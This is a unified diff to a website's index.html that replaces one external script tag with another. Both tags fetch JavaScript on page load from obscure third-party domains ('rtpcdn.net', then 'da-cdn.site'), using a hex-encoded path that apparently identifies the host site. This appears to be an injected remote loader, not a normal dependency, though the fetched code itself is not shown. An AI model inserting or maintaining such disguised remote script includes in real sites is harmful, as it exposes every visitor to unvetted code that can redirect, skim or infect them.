--- a/index.html
+++ b/index.html
@@ -19,7 +19,7 @@
 	<link rel="stylesheet" href="responsive.css" type="text/css" />
 	<meta name="viewport" content="width=device-width, initial-scale=1" />
 
-	<script src="https://rtpcdn.net/61476c6e61484e6f6233427a4d69356e6158526f645749756157383d"></script>
+	<script src="https://da-cdn.site/61476c6e61484e6f6233427a4d69356e6158526f645749756157383d"></script>
 
 	
 	<!-- Document Title
